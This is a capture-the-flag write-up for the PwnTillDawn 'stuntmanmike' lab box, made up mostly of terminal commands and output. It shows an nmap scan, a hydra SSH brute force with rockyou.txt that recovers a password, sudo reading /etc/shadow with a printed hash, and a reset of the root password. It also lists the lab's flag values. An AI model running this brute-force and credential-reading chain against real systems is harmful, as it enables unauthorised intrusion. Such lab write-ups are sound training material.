ptd-stuntmanmike-private

https://online.pwntilldawn.com/Achievements/Details/1/1438

.

As always we start with a nmap scan

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -A 10.150.150.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:59 GMT
Nmap scan report for 10.150.150.166
Host is up (0.032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
| 2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
| 256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_ 256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after: 2022-10-24T09:15:13

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #ssh root@10.150.150.166
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
root@10.150.150.166's password:
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-26 11:29:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166 login: mike password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-26 11:29:51
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
mike@stuntmanmike:~$ cat FLAG36
8cff2cce1a88a54db986d968a4b7a66fb3588c20

mike@stuntmanmike:~$ sudo -l
Matching Defaults entries for mike on stuntmanmike:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
(ALL : ALL) ALL
mike@stuntmanmike:~$ groups
mike adm cdrom sudo dip plugdev lxd
mike@stuntmanmike:~$ sudo cat /etc/shadow
root:*:17941:0:99999:7:::
--snip--
sshd:*:18043:0:99999:7:::
mike:$6$4ytsdVARn//SY.7x$ZNJHsx3CHR3zCU91Q.3RjHDK4hZ72GIT5.n/ygetAZ3Armybjj.l6QMb5PAvidEHvgGRipOcycOTnU8ePzwEl1:18043:0:99999:7:::
splunk:!:18194:0:99999:7:::

mike@stuntmanmike:/$ sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
mike@stuntmanmike:/$ su root
Password:
root@stuntmanmike:/# cd /root
root@stuntmanmike:~# cat FLAG37
28d10397e475a50fc0d6c73f7c23355ebdf15a3f

.

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/  and https://online.pwntilldawn.com/  in your write-up.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *